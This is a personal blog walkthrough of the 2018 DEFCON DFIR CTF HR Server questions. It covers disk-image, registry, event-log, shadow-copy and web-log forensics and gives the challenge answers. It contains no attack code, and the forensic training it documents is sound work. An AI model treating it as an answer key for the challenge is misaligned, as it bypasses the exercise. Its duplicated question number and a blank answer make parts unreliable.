DFIR Defcon Challenge — 2018 — My take — Part 1
I have been trying to write this for a while and finally thought I should give it a go before i forget how i did that. I scribble most of my day to day tasks/solutions in my notebook but often the words that i write at the time give a different meaning when i read at a later point.
Views that i express here are my own and does not in any way explain the quality or work that i do with my employer. Tools that i use are mostly open source (at times would embark into the free trial versions)and in no way intends to claim the work of the creator.
I have been listening to the forensic podcast (David Cowen’s Hacking Exposed blog)for a while, mostly during my drive from office to home(vice-versa) and have also been a fan of the experiments they do in Lunch test kitchen show. One such talk they gave in the podcast led me to this challenge and gave me an idea to try this out. Pretty late to the party though as the blog highlights that there would be a DFIR CTF challenge setup in magnetforensics summit this April ‘19.
There is a neat and complete solution explained by Mon in this link below: https://medium.com/@monliclican/defcon-dfir-ctf-2018-lessons-learned-890ef781b96c
Link to challenge and CTF: https://www.hecfblog.com/2018/08/daily-blog-451-defcon-dfir-ctf-2018.html
Ok Let’s get started. Let me share my current scoreboard before i complete them on my own (or take a peek out at others blog for answers :P)
For the sake of demonstration i am registering a new account to start from the initial question given in challenge.
HR Server Basic
Q1. Which software was used to image the HR Server?
so if you extract image1 from the compressed file you will find the disk image was taken in .eo1 format and it also has an text document attached to it(which has the answer). I have a SIFT Workstation installed in VMWare Player and use the FTK Imager from windows desktop if the solution is pretty straight forward or if there is a windows freeware available to extract the data out.
I mount the image in FTK Imager and click on the properties which gives me XWF 19.6
Q2. Which version of the software was used to image the HR Server? [Format: n.n]
Answer: 19.6
Q3. What is the file name that represents MFT Entry 168043?
Lets mount the image in SIFT workstation and use the sleuthkit command line option which i find easier since i find command line tools fascinating than GUI versions
our SIFT toolset has many options to mount the disk image. ewfmount, imageMounter.py script, autopsy image load etc.
ewfmount diskimage mountdirectory (command line used)
lets use fdisk -l or mmls command line option to identify the disk layer artifacts
I tried the default mount option without specifying the offset which threw me few errors. Let me set the offset option where the ntfs filesystem is located to mount. this can be extracted by multiplying the start of sector address from mmls or fdisk with 512 bytes.
The below screenshot explains how to use the command line options at each layer. I assume the below image is outdated as i remember seeing this during my college days. (data layer commands have been renamed to blkstat) The question references MFT entry which falls under Meta data layer
Lets point the start of operating system address (in sectors, not in bytes) to the physical disk and use the mft entry (inode number) to get the desired output.
Another option is to use the ffind option from filename layer which can also do our searches based on inode number
Q4. What is the MFT Entry number of the following file? \xampp\mysql\bin\mysql.exe
Lets use ifind command line option to get the mft entry number used by the above filepath. Got stuck since i was pasting the above input in my input command. Linux interprets the output in backward slash unlike windows. Make sure you enter the slack for above filepath under your -n argument
Q5. What is the MFT Attribute ID of the named $J data attribute for the MFT Entry with a file name of $UsnJrnl?
Sleuthkit can read the metadata address and for NTFS filesystem it is displayed as ADDR-TYPE-ID
ADDR is the metadata address, TYPE is the attribute type, and ID is the attribute id.
we can use fls -r option to recurse across directories to get our desired output
Answer: 3
Q6: At 2018–08–08 18:10:38.554 (UTC) what was the IP address of the the client that attempted to access SMB via an anonymous logon?
I proceeded to open the windows security.evtx log after mounting the image in FTKImager. I could only find 36 events there. No event got captured in the above time frame. Then i started looking at other logs that could capture this and found the event log named “Microsoft-Windows-SMBServer%4Security”
Q7: What was the name of the batch file saved by mpowers?
[answer is fullpath starting with c:*****]
Extracted NTUSER.DAT from mpowers folder and parsed it to using regripper
Searched for .bat listed many hits in recent keys hive which led to this answer
Answer: C:\Production\update_app.bat
Q9. What is the name of the hr management application that hosts a web server?
search for the keyword in users registry revealed xampp program being called out for running which is a famous web application hosting tool.
Answer: OrangeHRM
Q10. What was the public url for the HR system’s portal?
since the earlier clue gave an indication that xampp was being used for launching, let try to look at the access.log which would capture the urls accessed on that application
to locate the folder where the application was installed the fls query was used against the image for the keyword OrangeHRM
istat on the mft address (128558) revealed the entry as a directory and Parent MFT entry number 59 revealed it is under Program Files folder.
Navigating into the apache access.log folder revealed the public ip used by the application
Answer: http://74.118.139.108/orangehrm-4.1/symfony/web/index.php/auth/login
Q11. What is name of the file that had a change recorded with an update sequence number of 368701440?
using the output gathered from Question 5, extract the contents using icat commandline
using usn.py with -v verbose option point the file extracted and get the corresponding hit
Answer:
Q11. What is the name of the deleted file with a reference number of 12947848928752043?
search for the file reference number in the earlier output and look for the reason with delete in it or back refer the MFT entry in istat commandline
Answer: _MEI78882
HR Server — Advanced
Q1. At 2018–07–30 22:31:33 UTC which user was logged in under, what was the logon type (integer), and the logon process name?
while answering HRServer — Basic Q6, we found that there are limited event logs and 1102 Audit clearance was issued and most of them are listed under operational event logs instead of their standard security.evtx log folder, I exported all event logs listed under winevt folder using FTKimager and copied it into a Folder called Logs to make sure that i am not missing any operational log folder that would have caught our desired output.
I used this powershell log parser listed under github which can parse all event logs under a folder in a single shot and output the fields into a .csv file.
I opened “mytimeline.csv” and filtered the time created event to “2018–07–30 22h” so that i can see all events that happened around the said time.
I got the below output where key pieces of the question got answered
So with all the available Logs that i found from terminal services folder, i formulated my answer as mpowers — 10 — Mstsc.exe — 74.118.138.195. Oops! the answer that i gave was wrong as my assumption was rdp client process would be mstsc.exe. I tried multiple entries and i could not clear this level.
Since the above answer hit a dead end, I proceeded to check if any volume shadow copies stored in this system which could contain an unaltered standard event logs copy before it was cleared (Event ID: 1102)
The vshadowinfo command was used to check when the volume shadow copy was created. It showed it was created on 07th Aug 18 which is earlier than our pivot point and it might have our desired outcome.
The vshadowmount command was used to mount the volume shadow copy.
I navigated to the mounted volume shadow location and then again ran my mount command as shown below:
First lets find the standard event Logs (application,Security,System) file size in volume shadow copy vs our file system mount location. The volume shadow copy’s file size was large compared to our audit log cleared event file.
I copied the security.evtx file from shadow copy and used Event Log explorer tool and filtered the event ID 4624 to view the below output
Answer: mpowers — 10 — User32–74.118.138.195 (make sure you leave some Space between the hyphens)
Q2. At 2018–07–27 02:42:43 (UTC), what is the name of the task that was started?
Based on the event logs that i have parsed using Parse-LogsToTimeLine.ps1 script, i have filtered my output to the above mentioned timeline. The Microsoft-Windows-TaskScheduler operational logs has a line item highlighting the task that was started.
Answer: Throw Taco
Q3: Which IP address was accessing the OrangeHRM portal via Chrome 68.0.3440.84?
The best place to get this info is to look at the access.log in OrangeHRM folder and grep the results for Chrome 68.0.3440.84. Since the log adds a slash between the User agent and version make sure you include the relevant symbol.
Answer: 74.118.139.108
Q4. What version of Apache was being used?
I navigated to the error.log folder and found an entry in the log lines as apache 2.4.26
Answer: 2.4
Q5. What is the integer representation for the reason code given a USN V2 record where the record’s reason flags have the following:
USN_REASON_CLOSE | USN_REASON_DATA_EXTEND | USN_REASON_FILE_CREATE
I did a search on google for the official USN V2 record KB and it took me to this link where the hex values were documented as follows
USN_REASON_CLOSE — 0x80000000 — The file or directory is closed.
USN_REASON_FILE_CREATE — 0x00000100 — The file or directory is created for the first time
USN_REASON_DATA_EXTEND — 0x00000002 — The file or directory is extended (added to).
I switched to calculator and entered the Hex values as 0x80000102, combining all the above values into one. The decimal equivalent was the answer for this challenge.
Answer: 2147483906
HR Server — Expert
Q1. What was the top communicating IP address with the web server?
To answer this, we need some kind of parser that would format the output of access.log in a csv or excel. The log2timeline tool also has a module for web logs which can help us with this problem.
The output was sent to a pivot table as shown below and conditional formatting was used to highlight the top 10 items.
Answer: 74.118.138.195
Q2. How many requests were made to the web server where the requested url contained a wget command within in?
The apache2access.csv output was filtered on the resource accessed or the complete log file with the keyword ‘wget’
Answer: 101 (102–1 row for header)
Once this is done, the following level unlocks which has the password to the next image.
Thanks for reading. I will write my walk through for the remaining images in the upcoming days!